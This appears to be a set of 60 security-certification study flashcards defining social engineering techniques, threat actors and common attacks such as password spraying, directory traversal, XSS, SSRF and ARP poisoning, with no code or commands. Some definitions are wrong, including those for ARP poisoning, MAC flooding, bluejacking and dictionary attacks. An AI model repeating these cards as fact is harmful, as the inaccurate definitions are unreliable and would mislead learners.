Chapter 8: Social Engineering and Attacks Flashcards

1
Q

two types active and passive; passive is where the attacker researches your company and collect information that will be used at a later stage. Active is where the attacker interacts with the user or their desktop—someone has your username and tries to reset the password

A

Reconnaissance

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

campaigns are a social engineering attack to influence people form countries all over the world—two types: social media and hybrid warfare

A

Influence Campaigns

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

carried out by state actors to influence the balance of power in a country using military political economic or civil means

A

Hybrid warfare

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

when someone removes the trash from your trash in hopes of finding a letter that holds PII that can be used to commit fraud.

A

Dumpster Diving

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

involves a person standing behind someone who is using a computer so that they can see sensitive information

A

Shoulder surfing

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

companies in the same industry visit similar websites. Therefore, attackers identify a website that people in a particular industry are likely to visit and then infect with a virus.

A

Watering Hole Attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

this is a DNS redirection attack where either the DNS cache has been poisoned or an entry is placed in your hosts file. The victim is redirected to a fraudulent website.

A

Pharming

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Types of Social Engineering

A

Authority: email may be sent out by someone of a higher authority ordering you to complete a form that can be accessed by clicking a link.

Intimidation: someone pretending to be someone of high authority. They then threaten an individual telling them they are in trouble if don’t do what they are told.

Urgency: someone arriving at a reception desk and demanding access quickly.
Scarcity: panic to make a snap decision. “Only one room left”

Familiarity and Trust: hackers make themselves familiar to their victims; they come around a lot bringing them boxes of chocolates and eventually they become trusted

Consensus: people like to be accepted by peers and coworkers. An attacker might ask for some information and state that they obtained it last week from a coworker and need an update on it.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

has no information because they are not authorized by the company
-hacker

A

Black Hat

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

is provided with limited information from the company because may be participating in the bug bounty program-may be known as ethical hackers

A

Gray Hat

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

is an ethical hacker who is employed by the company to test applications for flaws and vulnerabilities.

A

White Hat

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

external threat actor who defaces your website or breaks into your computer or network. They are politically motivated and seek social change.

A

Hactivists

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

this is where people plug their own computers and devices into your network without your consent.

A

Shadow IT

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

person who does not have expert technical knowledge and uses script and code that they find to launch an attack on your company

A

Script Kiddie

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

another country that poses a threat to your country

A

State Actors

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

external threat that tries to steal data from your network but they are there for an extremely long period of time. They are well organized well funded and sophisticated

A

Advanced Persistent Threat (APT)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

Target mainly to steal money

A

Criminal Syndicates

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

disgruntled employee that may have been overlooked for promotion and relationship with company has gone sour.

A

Insider Threat

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

start by using all the words in the oxford English Dictionary and use them to try and crack passwords, but misspelled names or passwords with special characters cant be cracked.
-could crack elasticity but not el@sticity

A

Dictionary Attacks

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

runs though all the different combinations of letters and characters and will eventually crack a given password. The length of the password may slow down such an attack, but will eventually be cracked.

A

Brute Force Attacks

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

is a combination of both a dictionary and a brute force attack

A

Hybrid Attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q

password spraying uses the most common password in a type of reverse brute force attack. The hacker first searches the internet for people who work within an organization and see whether they can work out the standard naming convention.

A

Spraying Attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

this is where an attacker navigates through a structure of a web server moving from page to page searching for login details. It is known to use …/ to navigate through the directory structure.

A

Directory Traversal

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
Q

can also be called “skimming” where a credit card has been put through a card cloning machine. The most common places for these devices are ATMs or when you pay a bill at a restaurant

A

Card Cloning

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
25
Q

the attacker intercepts traffic going between two hosts then changes the information in the packets in real time.

A

Man in the Middle Attack (MITM)

26
Q

where a malicious plugin or script has been downloaded and the browser has been compromised. It acts like a trojan.

A

Man in the Browser Attack (MITB)

27
Q

is an on path attack that intercepts data but replays it at a later date

A

replay attack

28
Q

when a user visits a website a Session ID is set up between the user and the webserver. This information can be stored in a cookie and is present in the traffic going between the user and the website. The attacker can steal a cookie or can use a protocol analyzer and capture the Session ID from HTTP packets.

A

Session Replay Attack

29
Q

where the victim’s machine or network is flooded with a high volume of requests from another host so that it is not available for any other host to use. A common method is to use SYN flood attacks, where the first two parts of the three way handshake occur

A

DoS Attack

30
Q

when an exploit is found but at the time there is no solution to prevent it.

A

zero day attack

31
Q

this is where an attacker gains access to the network via a vulnerable host. It then attacks a critical server such as a domain controller or a database server. In a virtual world it would be called a Virtual Escape.

A

Pivoting

32
Q

older operating systems such as Windows NT 4.0 stored the password locally and it was hashed with MD4. Attackers used to use a rainbow table to complete a hash collision attack, an alternative would be the hashcat tool. Prevent pass the hash attacks by disabling NTLM

A

Pass the Hash Attack

33
Q

operates at layer 2 of the OSI using MAC addressed. It is an attack which a LAN is flooded with fake MAC addresses so that they can be linked to legitimate addresses

A

ARP Poisoning

34
Q

is the theft of a MAC address of another networked device, which is then used to gain access to the network.

A

MAC Spoofing Attack

35
Q

this is where an attacker floods a switch with a fake IP address to port mapping so that it consumes limited memory that a switch has.

A

MAC Flooding

36
Q

attack where an attacker wants to grant themselves more permissions than they are entitled to.

A

Privilege Escalation

37
Q

this is used when you want to pretend to be a different device, so you can connect to a network device or bypass the security on a captive portal

A

MAC Cloning Spoofing

38
Q

is the modification of the Internet Protocol packet using a fake IP address to mask the identity of the sender. This prevents the attacker from being traced when they carry out a malicious attack.

A

IP Spoofing

39
Q

this is an attack where the attackers carry out an SSL downgrade attack, where they manage to bypass the certificate based protection and turn the session into an HTTP attack.

A

SSL Stripping

40
Q

this is where an attack on the application consumes all available memory and CPU cores. It could also be where all IP addresses have been allocated on a DHCP server.

A

Resource Exhaustion

41
Q

this is a technique used for running code within the address space of another process by forcing it to load a DLL. This makes the application run differently from how it was designed to. You could install a malware DLL in another process

A

Dynamic Link Library Injection (DLL)

42
Q

The user must be authenticated to the webserver where the user clicks on a link, like, or share button to perform an action.

A

Cross Site Request Forgery (CSRF)

43
Q

will use a web application as their attack vector to create a packet from a backend server to look as if it has come from the localhost. The request looks if it has come from the server itself and will try and access the contents of the /etc/passwd file.

A

Server Side Request Forgery (SSRF)

44
Q

is when a user injects a malicious code into another user’s browser. It uses both HTML tags and JavaScript. The following is a very simple server side script to dis-play the latest comments.

A

Cross Site Scripting (XSS)

45
Q

occurs when a program tries to store more data than it can hold in a temporary memory storage area.

A

buffer overflow

46
Q

is a condition that occurs when the result of an arithmetic operation, such as multiplication or addition, exceeds the maximum size of the integer type used to store it.

A

integer overflow

47
Q

when you use SQL database, you can run queries against the SQL database using Transact SQL.

A

SQL Injection Attack

48
Q

applications have a tendency to create errors and the applications themselves do not validate the information returned in errors.

A

Improper Error Handling

49
Q

is where data is entered either using a web page or wizard; both are set up to only accept data in the correct format within a range of minimum and maximum values.

A

Input Validation

50
Q

is where an attacker takes control of a Bluetooth device such as a phone. They are then able to make phone calls and send texts

A

Bluejacking

51
Q

an attacker hijacks a Bluetooth phone but they extract contact details and any sensitive information.

A

Bluesnarfing

52
Q

is when someone tries to change domain registration of a domain with the internet authorities so they can control it for profit.

A

Domain Hijacking

53
Q

is a process in which a website is falsely removed from the results of a search engine and replaced by another web page that links to the remote page

A

URL Hijacking

54
Q

this is where an attacker redirects you from a legitimate website to a fraudulent website

A

URL Redirection

55
Q

hackers creates websites with characters transposed to redirect a users session to a fraudulent website. This is known as URL hijacking.

A

Typosquatting

56
Q

process of changing an applications code to avoid detection by anti virus software while still retaining its attack functionality

A

Refactoring

57
Q

small library that is transparently intercepts API calls and changes the arguments passed

A

Shimming

58
Q

the birthday paradox states that in a random gathering of 23 people, there is 50 percent change that two people will have the same birthday. If we store passwords as hashes all the password that are the same will produce the same hash if we use the same hashing algorithm

A

Birthday Attack

59
Q

lists of pre computer passwords with corresponding hash. You can obtain free rainbow tables from the internet

A

Rainbow Tables

60
Q

Open Permissions/Unsecure Root Accounts/Errors/Weak Encryption/Default Settings/Open Ports and Services

A

Weak Configurations